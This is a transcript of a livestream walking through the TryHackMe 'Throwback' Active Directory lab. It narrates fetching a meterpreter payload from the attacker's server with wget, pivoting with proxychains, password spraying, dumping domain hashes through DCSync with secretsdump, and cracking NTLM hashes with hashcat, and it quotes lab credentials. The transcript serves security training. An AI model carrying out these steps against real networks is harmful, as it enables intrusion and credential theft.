in just a moment, as soon as I am done with what I've been tasked to do. Now I'm getting more Discord notifications. Roger, okay. Now let's do a really, really cool stupid background thing. Let's install sl. Obviously this is important. Let's install steam locomotive. Add more time to the box? Did we add... we already added more time? I think we're good. I think we're good. Now that we've got steam locomotive...
I'm gonna do something different. We're gonna do something other than... yeah, yeah, matrix, we could do that in the lolcat. We get a lot of good stuff in line. We could do sl for steam locomotive. I think that one is extremely important, and then we'll set a new Sublime Text window that'll say "Be right back in three to five minutes". This is perfect. This is perfect. Let's set the transparency here. And then let's do a little while loop: do sl and like sleep for like a tenth of a second, so hopefully I can still Ctrl+C out of it. Perfect, perfect. Hold this down a little bit. Okay, great. "Be right back, three to five minutes." Make that the full screen. Oh, it's got to go down one line. No, it's perfect. That looks great. All right everybody, give me a little bit of time. I'll be back in just a little bit. Thank you, thank you. I love you. What's up? Hey everybody, thanks for sticking with me. I'm glad everybody's still hanging out. 50 of you guys, you're incredible, I love you so much. Thanks for the welcome back. Gotta wait for this sl command to finish. All right, Ctrl+C out of this. Fantastic. And we don't need that tab anymore. Okay. This is the real John, you can tell, because what is going on with that stream right now? Oh, it looked really funky. Is my stream just dying currently? Is that just a Twitch preview right now, or is the stream going crazy for everyone else too? Okay, it's good on your machine. Maybe my Chrome session just like gave up. Oh no, okay, it all looks better now. I'm sorry, I just had to refresh the page. Sorry about that. You do the sanity check. You can tell it's me because, as is the norm, as I come back from another break, it's time to crack open round two of the Monsty. So we're going all in. We're going big. Let's get back at it. I'm gonna change this profile back to what it was. And my meterpreter session on prod died. Great. That's fine.
I don't need prod currently. Where are we at? Doing some SQL. Regular SQL. And now we could work with this machine. Let me go ahead and do that evil-winrm to get into it, or SSH actually. Can I proxychains SSH into this machine? .224, and we are on .176, right? Looks like we need to specify the user as timekeeper. And did that have SSH? Does it have evil-winrm? This session suggested, now that we have the hash... SSH into throwback-time. I just did, and it didn't like it. 10 24 176. Oh, I needed to use prod. I needed prod. Dang it. I needed prod for my proxy, because that's what I was proxying out of. Let's reset that back. We were working with petersj, and his password was throwback317. Gotcha. Okay. Let me resize that again. So you can see here I still am in this directory and I no longer have my met... so I need to go redownload that. Where did I have not-a-shell? It's a meterpreter. Okay, so let's bring that back up. python -m http.server. I think I already had that server running over there, so let me kill that. And my IP address was 10.50.22.5. Gotcha. Okay. HTTP. Actually, honestly, I should probably put this in a normal location that's not going to be cleared. petersj. Gotcha. If you want to change your nickname, yeah, yeah, be John Hammond 011, level up. I am in PowerShell, so I can do a wget command as an alias to Invoke-WebRequest. I am 10.50.22.5. Yes, 8000, not-a-shell.exe, and let's -o that to met.exe. Okay, thanks for hanging out, peace, dude. What other jobs do I have running? Do I still have that? No, I'm not. Okay, let me go back to use multi/handler and then set my payload to what it should be: meterpreter/reverse_tcp. Yep. 10.0... and that was 42... oh shoot, 4141? Oh god, I don't remember. I think that was it. I really hope that was it. Met, please, please, meterpreter. Yeah, I'm on prod. Okay, good, good, good, good. So let's use autoroute, set session 4, and set the subnet to 10 224 zero slash 24.
Hey, welcome. What's up? What's going on? That should be good. I think that jobs is still running. So can I SSH now properly? Yes, yes, excellent, I can, and his password was keeper of time. Awesome. Okay. So now I'm back on the box. I'm doing okay. I'm doing some TryHackMe, uh, Throwback, and it's a lot of fun. So now that I'm back on the box of timekeeper with a real, regular command prompt shell, not just meterpreter... it's good to have meterpreter, but now it's good to have this actual shell, so I can go into xampp and take a look at that MySQL that we got here. So that's in xampp. dir. Sorry, I'm not in... and mysql is the directory there. So now I should be able to just run mysql. Oh no, it's in bin, is that right? dir. Is there a mysql client? There is mysql.exe, excellent. And do they have credentials for this already? I can hear "oh, oh, oh" from here. We could try the password that we got from throwback workstation 1 when Kerberoasting the SQL service account. We did get that MySQL password during that, and that we know is a service account that would authenticate with this service. So -u root -p and paste that guy in. I didn't paste him in. Paste that guy in, awesome. And now I have access to the database. I'm in a command line interface for working with MySQL. So, regular enumeration. I could show the databases that are prevalent here, and I have domain users, which is a peculiar database, pets, test and timekeep users. We're probably going to want to go check out the domain users one. Oh great, we found pets. "What database are the timekeep users logged in as?" They are in timekeep users. "What database are the domain users located in?" Probably domain users. Domain users. Domain users. Did I have a typo there? I probably did and I just didn't realize it. So, "What table was located in the domain users database?"
Let's go ahead and use that domain users database, and then let's show tables to see what we've got here. Looks like I see users. Super easy. "What is the first username in the table?" So let's select all from users and see what we've got. There's a flag in there. Clemson's d. Oh, I'm sorry, I had "domains users". Thank you, I realized my typo. Submit that flag. I'll do it, I'll do it. Let me jot this down real quick. Good. And I'll bring this up to task four when I get my flag submission panel. What is the SQL flag on throwback-time? That is number 12. Uh, oh, there's a root flag on that page, let me... 12 goes here. Let me move this up. Did I have 11? Oh no, that's the root flag. Um, I am in there, there is meterpreter on time, so let me interact with 3 in my Metasploit session, and I am a user administrator. Oh, I'm actually SYSTEM. Yeah, okay, fantastic. So under Users I think I have an Administrator user account. I can go in there, and in his Desktop we should be able to find a root.txt, which I can go ahead and cat out. Awesome. And we should go ahead and submit that for 11. Let me just note that in my README. Grab that prompt here. Great. Okay. Now let's get back to where we were, a lot of scrolling. We're done with that SQL now. We're doing this thing: "Now that we've dumped a list of users on the domain, we need to generate a wordlist of users and attempt to password spray." Gotcha. Yeah, I should probably take note of all of these users real quick. So let me select all these in a weird, junky way, but I'm gonna do it anyway, and I will remove all the white space and things that are getting in the way here. I'll put this into my usernames.txt file that I've kept, and now we have that. So, "To password spray domain users with CrackMapExec or CME, you'll first have to format your user list similar to how you format it with Hydra." That's fine.
I just did that. "After formatting our user list we can use CME to password spray across the domain and gain access to domain accounts. We can not only use the user list we got from the database, or namely... or namely, but we can also use a custom password list rather than spraying one password at a time." Okay. "When running the password spray, make sure to tunnel it through proxychains or it won't be able to validate." That makes sense. After password spraying, um, should we use our old passwords list that we had, or should we be using rockyou? Let's, I guess, just find out. So how much did we have in that passwords list? We had a few. And we actually know that we have some other passwords in here. So let me throw timekeeper in this username list, as we know that, and let me open up that passwords.txt list and actually add in some of the others that we know. So keeper of time was one of them. We also saw in the Mimikatz logs we had some cleartext passwords. Sign in FTW. This is what's... good thing we keep our log here. Password. I'll search for all these password entries and just see if I have anything new. Sign in FTW. There are 39 matches in here, so forgive me for frantic Sublime Text scrolling, but there we go: Blair has a password that we knew of earlier. Put that in our password list and... no, sorry, "password". Did I miss something? That's the only one. Those are the only cleartext ones we had, right? Okay, gotcha. Yeah, I appreciate it, Krillix. I realized some of the typos. I'm sorry. I hope maybe this is good, like you mentioned, like it's kind of cool to walk through this and see some stuff that might be, I don't know, that could be polished. Okay, let's do the thing now that we've got this. So let's do proxychains, /opt/crackmapexec, cme, smb as the protocol, and the machine that we want to get to, so 200.24.117, and -u for usernames and -p for passwords. And let's see if we get any hits. I'll zoom out on this and let it go. Oh, wait, what is happening?
I probably should move the domain list up, shouldn't I? Yeah, sorry, let me switch the usernames to start with the domain users, because I know those are kind of the most valuable ones that we care about right now. We'll run that one more time. Logon failure, I don't think, is a bad thing right now, because we are password spraying. So we'll see if we get a hit. And we are working through these. Okay, so should I use rockyou just in case any of these fail? We are using our common... we're using the weak passwords list that we wrote earlier. Jackson says no, this is good. All right. Hopefully we'll get a hit. We know our Summer 2020 was in there a little bit. I was able to hit a ton of the email accounts when we were hammering against SquirrelMail. Which users are you using? We're using the new list of domain users that we just got from the database that we pillaged. Domain users or that timekeeper users? We're using domain users. I didn't even go into timekeeper users, honestly. I guess I should. I think I had success using the timekeeper users. Okay. Yeah, I probably should have continued to actually use timekeeper users. I probably should have continued to... whatever, show databases. Timekeep users. I probably should have continued to pillage this database here. cd users. What am I doing? Uh, whoa, flag. Okay, let me take note of some of this. Thank you. Thank you for redirecting me to do smart things rather than the stupid things that I was doing. Did I already submit that flag? You're right, I did. That's the exact same flag as earlier. Fantastic. Well, we have a new list of passwords, so that's kind of handy. I don't know what's going on with this white space here, what weirdness that's doing. daviesj is in here twice. Some of these are funky. What is going on? Whatever. Nothing new. Nothing successful yet from CME. petersj is just a weird one, apparently. So okay, we have the right list. Okay, thank you, Krillix, because I got tired of finagling this list.
I don't know why this is weird. Like, Sublime apparently counts this as a whole line. So did we get any success that I didn't see earlier? Sorry, scrolling, scrolling, scrolling. Nothing yet. jeffersd with good old throwback 2020. Yeah. Okay, okay. We got a hit: jeffersd with throwback 2020. Um, I wonder if there's another... like, it would be good to kind of run this again, but like kind of remove some of the others, like the users that we went through. But if we got a domain user on the domain controller, then I think that's cool. Oh, sweet, we're gonna do that DCSync attack. "We have valid credentials on the domain controller and we need to elevate our privileges so we can dump hashes and enumerate further. We can use BloodHound to find potential attack vectors. Enumerating DCSync rights with BloodHound: the easiest way to enumerate a domain controller is by pulling domain information using SharpHound and using BloodHound to visualize the data. Remember using task 24." You can kind of refresh your memory on using this. I did see that "Find Principals with DCSync Rights", and that kind of led me down that rabbit hole within BloodHound's queries tab. You can run that. "From BloodHound we can find there is a backup account that has DCSync rights that we can use to dump the hashes." Uh, I don't have BloodHound running anymore, do I? Oh, I still do. Whoa, he's just tucked over in the back here. All right, all right, let's go to throwback.local and sure, DC. Right. Oh goodness, what am I looking at? spooks and mercerh. What is the backup account? backup, backup@throwback.local has the quickest way. Okay, he has GetChanges and GetChangesAll. Maybe that could be useful. Also Domain Controllers. "To exploit DCSync you need valid user credentials that have the DCSync rights, and we can find backup credentials on the device that gives us valid credentials." What? What?
Let me read that one more time. "Valid user credentials that have the DCSync rights. We can find backup credentials on the device that give us valid credentials with DCSync rights." I'm struggling with that sentence. "Exploiting a user with DCSync privileges is not as difficult as it sounds thanks to secretsdump within Impacket." Oh, oh, oh, oh, I did this in the Attacktive Directory room, with that AS-REP roasting / Kerberoasting thing.

Enumerate the device first? What, like enumerate the DC? Can I like log into the thing? I mean, I guess I can, now that I know credentials. Can I SSH to that? That feels weird, but maybe that's a thing. .117. Yes. throwback 2020. On the domain controller. Okay. We're doing it. Let's get that user.txt real quick. I am in regular command prompt, so I can't use cat. Let's go for type. Nice, nice. On the domain controller. Yeah, yeah, yeah, yeah, just SSH in; the path will be obvious. I guess I will have to review that after I go submit this flag. What is the user flag on that? That is number 13.

I love your videos. Thank you so much. I really appreciate you watching the videos. We're just kind of hanging out, keeping it casual here right now. And what else was I asking for? What is the root flag on the DC server? I need to be able to, like, privesc on a domain controller. I don't think I'm there yet.

EFI and update.ps1. Nope, sorry: type update.ps1. Mmm, that looks peculiar. What is EFI? Is it like UEFI, with boot stuff? Looks like it. In the Users directory we've got backup. Can I get in there? Nope. Can I get into any of these? Web service... I'm gonna stand by, because I think I need to do this DCSync here. Those are scripts for DNS uploading. Okay, well.

"To exploit DCSync you need valid credentials that have the DCSync rights. Exploiting a user with DCSync privileges is not as difficult as it sounds thanks to secretsdump." So they're using spooks here. Is that what I should have done? Should I have tracked down spooks as a user, or?
I feel like I can just use jeffersd. Yeah, I'm gonna try with jeffersd. I feel uncomfortable repeatedly saying jeffersd, I'll be honest, you know. Keeping it real.

Impacket. Impacket examples, and we have secretsdump. secretsdump. python3 secretsdump. And I need to specify the domain controller IP address. I was about to type my localhost address. .117, and that needs a user. -u? Is that right? No, no, no, no, no. How does that syntax go? throwback/jeffersd.

"Look for files within jeffersd's folders." Okay, sorry, thank you. "I lose connection on that database." I did; I just gave up, dude. "Find text." Roger, I will continue to look. Thank you for putting me on the straight and narrow path. He's got stuff in here. Can I just find... Whoa, whoa, Lord of type. Yeah, I don't think I could really do that on Windows. Yeah, wrong F word. Maybe some good stuff in his Downloads. Nope. How about his Documents? Backup notice, uh-huh. Yeah, dir /s would work just fine. Backup notice, with a type command, because we're in cmd.exe.

Hey, yo, I'm just gonna save this real quick. "As we back up the servers, all staff are to use the backup account for replicating the servers. Don't use your domain admin accounts on the backup server. The credentials for the backup are tbh backup 238." For the xlex mission point, Hans Mercer. Okay, all are to use this backup account, so I could use this. I would be able to SSH into that account. He does have a backup account. Okay. Yeah, we need a typing room. backup, will that work? Yeah, okay, great. Now I am that backup user here, so I know those credentials work. And I could use DCSync to do this; the backup account is the one that has the DCSync rights. Yep. Yeah, yeah, yeah, okay, I follow. I remember you saying. And that is what we saw in BloodHound.
So that's what we should be able to do, right, with secretsdump. So that's what I need to run this command with. I follow. So we ran secretsdump with that DC account, and then we would use throwback to get the domain in there: throwback/backup@10.200.24.117. It needs the password; I can slap that in. Would I need to proxychain that? No. Do I need to proxychain that? I feel like I need to proxychain that. I've been proxychaining to SSH, didn't I? Yeah. Duh, obviously. I follow. tbh backup. Go. Nice.

Nice. Oh, web service. A lot of good stuff here. Another user, stewartlittle. The throwback service, the stage service, there's tons here. So this secretsdump is doing the DCSync attack? No. Because he has DCSync privileges, he can dump credentials on the domain controller. So this is me pulling down all of the credentials on the domain controller. Gotcha. Okay. A lot of numbers there, dang. This is very cool to see, I will admit. This shows me, like, the danger of, okay, owning the domain controller, you know. But which one do you want to crack the password for? So, I think it would be cool to get, like, that Kerberos ticket granting ticket service, I think, if my understanding is correct. Or the administrator. I'd like to get an account; I'd like to get the administrator account here.

Holy crap, there's so much stuff. Okay, okay, okay. Oh, and there's some aspects of the corporate network. White screen to scroll through all this, and grab all of this because I want that administrator. secretsdump. "Look at task 23." Reviewing this, I remember the SQL service had it. Oh, sorry, sorry, I'm looking at a completely separate picture. mercerh. Is that enough? Is that credentials for you? "That's plenty, man." Is that mercerh? Yeah. Let's get mercerh's password then. Let's try that. It's this thing, right? Let me check if this is an easy cheesy peasy CrackStation thing, and then I'll throw it at hashcat. No, okay. Do I got to get my colabcat running again?
Dear God. Before I drive down that path... actually, I feel like I should. I will need my rule list this time. "Roger, good to know." Thank you. OPSEC go brr, as you would all say. Allow. Let's grab this. Slap that bad boy in there. Actually work, because I've realized the problem is that the Google copy thing does not do it. So mercerh with this guy. I need to understand how to specify this NTLM hash, because this is an NTLM hash, right? So hashcat example hashes, NTLM. That's just it; I literally just pass it. Is that all I need to do? Okay.

So, back to colabcat. We've got that guy set and running. We'll install hashcat one more time. Well, I hope this... was it already? So this is all... I mean, let me do another one. Well, I feel like I needed to recreate it, I don't know. Let's try and find out. There's a cell already running. Yeah, because we're trying to freaking compile hashcat again. Damn it. I don't know if it would keep the state, to be completely honest with you; I just honestly don't know. Yeah, it's a new... okay, it's a new instance of Colab each time. That's good to know. We got to wait till we see the said output here, and then I know that it's at the end.

Well, I hope this hasn't been too unbearable for you to watch, especially you, Krillix, because I realize, like, from the creator's perspective it's easy to see the very architected path and the trajectory. But, you know, as someone going through it, you get the deer-in-the-headlights look, like, I am not connecting the pieces that I'm supposed to be connecting, and you're like, oh yeah, I forgot that I need to get this user's credentials. Yeah, just no more Excel. No more Windows. hashcat's all good. See if he'll run this thing, as long as it's not my Windows.

Someone owned .232, and we were certain that wasn't doable. That's awesome. Wow, that's cool. Dude, props to them. If you guys stop running now, I think it's good.
I think, I feel like we're good. hashcat. Yeah, great, so echo that in. So now I have something.txt, which has the hash that I just stole from Mercer. So I need hashcat -m 1000 -r... Oh, should I need the rules? I need to go in the other directory. It's drive, My Drive, .hashcat, right. Good, okay, so I'll paste that in one more time and redirect that to, like, mercerh.txt. cat mer... Good, okay. hashcat -m 1000 -r OneRuleToRuleThemAll.rule mercerh.txt and rockyou.txt. One... oh, damn it, I typed in "one rules to rule them all". Okay, let's do this in Sublime Text to actually know what the heck we're typing. hashcat -m 1000 -r OneRuleToRuleThemAll.rule mercerh.txt and rockyou.txt. rockyou. Good, save. -a, what does that -a do? Nope, he got it.

We did it. We did it. We have his password. Using the backup account, which has DCSync rights, we could use secretsdump from Impacket to dump all the hashes on the domain. With that... oh, oh, okay, gotcha: -a specifies attack mode in hashcat. With that, we found mercerh's password, and we were able to crack it with colabcat and OneRuleToRuleThemAll. So now let's SSH as him: ssh mercerh@10.200.24.117. proxychains. proxychains. Spending my time at the gym with my boy SSH. Nice.

Administrator. Got to that desktop. Boom, at last. Commands fail. root.txt. type. I want PowerShell. Great, we did it, at least that part. Cool, that should be 14, right? What is the admin... what is the root flag on that guy?
So let's mark that as completed, and let's slap that into four. Submit. Okay. We still have not even gotten into corp, so I feel like we still got a ways to go.

"This forest has trust issues." All right, so "we've dumped credentials on the primary domain controller, and we can use these credentials to find the other domains or forests that we can gain a foothold on. We can begin by using some offensive PowerShell or BloodHound to find a forest trust, and then use credentials to gain access to a segmented domain controller." So we did see, in our previous BloodHound work, that we have "Map Domain Trusts", and there is a .local other domain. So I'm assuming we're gonna end up doing that. Also, this is a friggin' world view in Pokemon Ruby, Sapphire and Emerald. That's awesome. Really, that's the only important thing to glean from this whole room. It's the first forest. Oh my gosh, what a beautiful gem.

"Trusts are a mechanism in place for users in the network to gain access to other resources in the domain. For the most part, trusts outline the way that domains inside of a forest communicate with each other. In some environments, trusts can be extended out to external domains and even forests." In that case, okay. "There are two types of trusts that can determine how domains communicate. Find an outline of the trusts below." There's a directional trust, where it's only going in one direction: "the direction of the trust flows from a trusting domain to a trusted domain." A transitive says "the trust relationship expands beyond just two domains to include other trusted domains."

I think what I've heard, to help mentally capture that, is that say you are person A, and you really like your friend, person B. That's just one-directional, right?
But in a transitive one, let's say your friend, person B, has other friends, person C and D, and you can say, like, your friend's friends are your friends. So you as an individual, or person A, will also trust C and D, because you know that your buddy likes them, right? Yeah. That's smart. That's just how you teach people.

"The type of trust put in place determines how the domain and trees and forests are able to communicate and send data to and from each other. When attacking in an Active Directory environment, you can sometimes abuse these trusts in order to move laterally throughout the network." We can be... yeah, so actually, with Jackson's point with directional: from what I understand, is it just a one-way thing? "The direction of trust flows from a trusting domain to a trusted domain." It's not vice versa, or is it? Is it a pointed, one-direction trust, or is it both ways? Is it a two-way street? Transitive: person A trusts everything that person B trusts; that's transitive, from what I understand. I'm waiting on Krillix to tell me the holy word about a bidirectional trust, or if it's singular or pointed in one direction. "Like the band, it can be bidirectional." Okay. Is it not strictly? Okay, sorry, I'm continuing reading to learn here.

In this case, we'll probably want a proxy server on the domain controller itself, so we should do that. Which domain has a trust relationship with throwback.local? We have corporate.local. What is the hostname of the machine that has a forest trust with the domain controller? How can I tell that host? What is the hostname of the machine that has a forest trust with the domain controller? Sorry. Yeah, I was... John was like... I was ice cold, frozen there. This is just domain trusts, but I want to know the machine. Does it tell me? Transitive controllers. Can I drill into this? Oh, I guess I can. Click on corporate.local in BloodHound. Okay. Let me go back.
Thank you. First-degree trust is on it; it has one. That's just going to be the domain, not the machine itself. "No, no, no, you're good, you're not wrong." I guess I can get on the box now, can I not? I don't think I even have xfreerdp on my machine. xfreerdp. That would be a good thing to have, considering. I mean, I guess I can do it. Can I proxychains Remmina? Will that work? I don't want to exit out of that, actually. So let's use xfreerdp. I feel like, once we do the RDP on the machine, if we were to take a look at those domain things, then we would be able to totally find... Uh oh, what Krillix says: "dear God," and now I'm very concerned. Are you just tweaking out about the number of shells open? "I was gonna say, no, proxychaining Remmina." I follow. It could have been either. Yeah, yeah, I was gonna say.

All right, let's proxychains xfreerdp. We need to specify the user, and that's mercerh in this case, and his password is pika pikachu seven, because that's genius, and the host, 10.200.24.117. Do I need to specify -h there? -v. Terminal, terminal, okay. Oh, I was very concerned for a second. That command's gone, apparently. proxychains... I just completely blanked, I'm sorry. xfreerdp, user mercerh. I was gonna say everyone was like, please, terminator, crash, please ruin everything again. Yeah, that's totally my certificate; I trust that baby like no tomorrow, dude. Boom.

The root.txt, we already got that, not a concern. We can look at Server Manager and get an idea as to what Active Directory stuff is going on here. Maybe Active Directory Domain... nice. Yeah. Can I... shut down local server. Domains and Trusts, that sounds interesting. corporate.local, let's explore that. "There are no items to show." Fantastic. Can I learn a little bit more about it? If you give me that, Properties, Trusts. throwback.local, it's managed by... straight nothing. If I right-click Manage, can I do anything with it?
Okay. Yeah, I was gonna say I'll probably break this on accident, as I tend to do. CORP-ADT01, that looks like a potential host. We can keep him in mind. Groups, Managed Service Accounts. Yes, I'll ruin it, don't worry. This is what you came to see. Okay, I feel like I found... is that CORP-ADT01 kind of where I'm looking here? No. What is the hostname of a machine that has a forest trust with the domain controller? What do I do? How do I find that? Am I not understanding that? I think I figured that out. Active Directory Administrative Center. Is there a Trusts section in this? No. Domain Controllers, that's the only one.

"There was another file on the desktop. Did you check it out?" Excuse me. Recycle Bin on my desktop, or do you mean the DNS update? That I saw on the Administrator's desktop. I totally didn't check it out, and I totally should have. Give me the permission, please. Thank you. I thought this was just going to be more administrator things. More DNS stuff. I remember Krillix mentioned that, like, no, no, no, don't worry about that. And it doesn't look like there's anything extremely interesting here, other than .232. What is .232? Didn't we have that as mail? It's mentioning mail. What is that? Oh, that's xfreerdp. Yeah, .232 is mail. "You were looking at devices on corp. Look for devices on throwback." Oh, I follow, I follow. Thank you, thank you for keeping me sane.

Let me go back to those Domains and Trusts then, and I'll see if there's anything I can do when I manage that thing. throwback.local has some computers, right. That's just going to be DC01. I already have that description, B89. Yeah, I do. Okay. You can tell I'm, like, floundering here; I do not normally look at Active Directory stuff. Those aren't the only computers that it's managing, are they? "Look at the DNS and then attempt the name scan, nmap scan." Oh, oh, oh, like the DNS server here, and try to see if it has anything smarter for corporate. I don't need Computer Management.
I need... I want the DNS. I follow, I think I follow. "Look at the Domain Controllers organizational unit in the corp management tab." Okay, so going back to our Domains and Trusts, going into corporate, check out Manage and organizational units. Is that a thing? Oh God. I'm truly sorry. This has to be super painful; I'm truly sorry. These are organizational units, but Domain Controllers: CORP-DC01. Oh dear God, did I not see that earlier? Oh my gosh. I'm sorry. I'm just letting it sink in right now that I didn't find that. I'm sorry. I'm just staring at it more so I can remind myself of how horrendous I... So that would make sense, right? Because Domain Controllers. Yeah, I was gonna say, it kind of didn't seem like it was there. Maybe I was wrong, I don't know. I'm glad Jackson is backing me up.

What is the administrator account we can use to access the second forest? Mercer? He's still an admin account. What is the name of the file in the Administrator's Documents folder? There's a file of the Administrator's... Yeah, yeah, we'll have to look at the video after the fact, apparently. What am I doing? Back to my RDP, or my xfreerdp. There was something in his Documents that I completely missed, apparently. No, in Mercer's Documents: Blair.bat. Hey yo, why the fudge? I should be on... oh, oh, oh, wait a second. The corporate environment, so this is corp DC. .118 is corp's DC. I follow. To get into that, Mercer can still reach that. So I actually still need to get a proxychains server on this thing, don't I? Because I think this DC is the only thing that can actually reach it. I wouldn't be able to SSH into .118, I think. Let me find out. I don't think I would be able to reach him. No, that's gonna choke. So let me get a proxychains... let me get that set up on throwback's DC. We do have access to him because Mercer had access. throwback 2020? What was this password? pika pikachu. Excuse me, excuse me.
Oh no. Get out of here, Windows Excel. I never want to see you ever again in my life. Okay. No, let's do the PowerShells. PowerShells with two L's. Incredible. Let's get my notashell going. Invoke... or let's just do some wget: wget http://10.50.22.5:8000/notashell.exe. We'll output that to met.exe, and then let's background my Meterpreter sessions, see what I've got, just to kind of check. We have that on time. We also have the proxy servers running.

I will need a... I feel like... am I misunderstanding this, where I'm going to end up having two proxy servers? Like, I'm using WS01 to get to the domain controller, and I'm going to need the domain controller to get into... okay. It's a reverse shell, so can I just run autoroute and socks4a and it'll be totally fine? Chat's going like, what the heck are you talking about? Oh, "if it just has the session then it's going to understand." I follow, okay, I think I follow. So if we get met to just friggin' respond to us, then we're good, because it'll already have autorouted some of that stuff, right?

So let's use multi/handler. Let's set that payload to windows/meterpreter/reverse_tcp. set LHOST tun0, set LPORT 4141. Let's get ready to do ./met.exe over on our victim. Let's run that guy, whack it, and okay, I see the domain controller just kicked through. We also had Workstation01 quick on the trigger; we got petersj coming in, or whoever that was, I forget. So we could background that then, if we're just kind of good there. So I could proxychains now to ping 10.200.24.118. It's not going to respond to ping; I wouldn't think it would anyway. ssh mercerh@ that. It might, out of understanding. Should I do... does it need the autoroute? Or did I not include my proxychains? No, here, I included my proxychains. Did I get rid of the previous autoroute?
I don't think so. I mean, I could just use autoroute again and kind of do it. I'm in session six now. I don't think this will break anything, but that doesn't get me to .118 unless I'm misunderstanding and doing it wrong. I got to remove the old one first. So, okay, isn't that something that I can do as a script? Or I guess I would just need to set CMD to, like, delete. Now I'm just getting sketched out. So if I set SESSION 4... Yeah, inside the session, like it should be. I can tinker with it, right? sessions -i, let's go to six. So now I am on the DC, and so if I run autoroute, I can see what I have set up, or at least the examples. So we could add here a new subnet. I don't want to delete the old one. Add a route, as we have. So run autoroute. Chrome again is tweaking out on me. I'd make sure the stream didn't die. Yeah, sorry, -p will print them, good call.

On session four, I want to add one for session five, or session six. So let me go ahead and add 10.200.24.0 with that subnet mask. Do I need to specify that netmask if I delete it? I'm going to get sketched out. Will I seriously be able to go ahead and delete it and then not lose a connection to this thing? Dear God, let me typo that three times. So I know... "Could not delete route." Why could I not delete that route? Is that not because I'm actually actively using it? "You have a reverse shell, you'll totally be fine. Delete session four." Now that's deleted, theoretically. set SESSION 6, and set CMD to autoadd, and now set that up. "Did not find any new subnets to add." Can I just run add? Make sure that actually works. set SUBNET. That's totally fine. sessions -i 6. Run autoroute with -p. Still at session four, and it's not letting me delete it. Still can SSH. autoroute -s -d? Not the other way around: run autoroute -s -d. The current one that we had. Did I totally mistype that earlier and just make a fool of myself?
Oh, oh, oh, I needed the /24. That's the problem. No, -s -d gets me a syntax error, because it looks like it needs to be -d -s first, but supplying it afterwards still fumbles. Why would it need a .1? Why? Please, terminator, crash. Just reset my mind real quick. Why would Meterpreter not let me... I don't feel like I have a syntax error. Like, am I crazy right now? Does route work as an old command? route. "What a subnet mask." "Try giving a session number at the end." And session number. I don't know what you're saying. If I run autoroute -h... Excuse me. I failed that. autoroute, to delete, oh, oh, oh. "Using that syntax you need to use route add and then 10.200.24.0/24." Okay, and then the subnet mask, 255.255.255.0, and the session number. "Invalid IP address." Why do you need an IP address there? "One or more of the arguments are not correct." Fill that. What the fudge. Route remove.

All right, man, I appreciate you spoon-feeding me here, because I am struggling to death on this. I don't... yeah, delete. I guess I just googled that; that doesn't really help. msfconsole commands. Yeah, scroll down to the route portion. I'll take that guy. route del. "You can route flush, but there might be some danger to that." I don't know. route delete. Let's do a route flush and see how much we break. That doesn't know it. Okay, msfconsole commands. Yeah, route delete 10.200.24.0 255.255.255.0 4. That's still whining. "It's an IP address, subnet mask." Still funky. Nothing. Let's look at all the routes we have. route. This is all just in this session, right? Like, when I run that route command as Meterpreter, or inside a Meterpreter, that's the routes for this specific one. "Maybe this can help you." I'm scared of what link you're sending me. I'm sketched out; I'm sketched out by links. I don't know if that's really what I needed right now. Mmm, what, should we just flush it? Should we just redo it? Yeah, don't troll.
I got you. I almost feel like we want terminator to crash right now, just to reset ours. That's the thing. Yeah, if we were to crash this, we'd lose a reverse shell and we'd lose access to the DC right now, so that wouldn't really help us. But I am racking my brain, while we can't add a route, and we can't delete one either. Yeah, yeah, that would be bad. This doesn't make sense to me. What the heck. "Or you can close msf, SSH into production, and then from production SSH into the DC and run the Metasploit binary." We'd have to bind to a specific place, wouldn't we?

Hey, greasy, woot, Panam, hello. Welcome, everybody that wanted to come hang out. We're riding the struggle bus right now, wrestling with Meterpreter routes, because we're trying to move into the corporate network inside of Throwback, but we need another proxy server running on the domain controller itself. "Still better than wrestling with Excel." You're right. I can't turn you down there. If I set the session to something else, does it just do it? delete. Run. I'll set it on every single session, man. Run it on everything. Just delete the route, please. Please tell me one of those worked. What? What? Is it syntax? Is this syntax... didn't work? That looks weird to me: 10.200.24.0/24/255.255.255.0. That looks funky, honestly. Yeah, even if I were to interact with the session and try a little route flush, it's like, now that's not a thing anymore. So that doesn't help. Maybe that's something for the specific module.

Oh. Yeah. Our subnet is wrong. Their example says 10.10.10.0. Yeah. What the boop? Oh my gosh. set CMD delete, set SESSION 4. Please, please. I was looking at that and I was like, oh my gosh. Thanks for sticking with me, everybody. Have you ever hated yourself so much that you...
Okay, okay. Okay. Now let's set SESSION 6 and let's set the command to add. So when we verify what we're looking at, we're actually going to add a route to this thing. run. Now, pretty, pretty please, can I SSH? What is wrong now? I don't understand it. Is that machine just not running? ssh. "Delete and autoadd." Yeah, yeah, you know what, you might be right there. You might be right. show options. Do it. Get rid of that. Get rid of that thing. Just a little sanity check, just make sure I'm not insane. run. "No routes currently defined." autoadd. show options. Session is six, for the domain controller, throwback, mercerh on DC1. We're gonna autoadd to a regular route on 24. Do it. With that, I should be able to SSH. This is rough. This is tough, guys. Why? Yeah, and this is when terminator crashes, right?

"See, this is why you should just use sshuttle." I don't know how, I mean, could we sshuttle into this? We could sshuttle into this, could we not? Yeah, that actually might work, right? This is sshuttle. It won't work on Windows, but it has an SSH server. Oh, it doesn't have Python, and it needs that Python agent, doesn't it? Yeah. How is the environment doing? Maybe the thing just broke and that's why we can't probe. 24 minutes left. "John is dead and triggered inside." How did you know, guys? Do I have the wrong IP address or anything? 10.200.24.118. 10.200.24.118. Can I WinRM? I know, I know proxychains doesn't like WinRM. "Password's wrong." Oh, you're right, you're right, you're right. Thank you, thank you, thank you. Good call, good call. Thank you. pika pikachu seven, please, dear God, give me some access, and then I'll just fire another Meterpreter session off in there. That's still a little wrong password, like, just a sanity check. pika pikachu seven. I passed in "pikachu", God, mother... There we go. I want to die. I want to die. Okay. We're in, boys. We're in, boys and girls. Yeah, virtual high five, bam. You're all incredible.
Thank you, especially Jackson, for roughing that out with me, dude. Thank you, thank you. We probably could RDP at that point. I mean, like you said, we could probably xfreerdp into him. We got some stuff in the corp domain. Let's copy this bad boy and slap it into corp-dc01.txt.

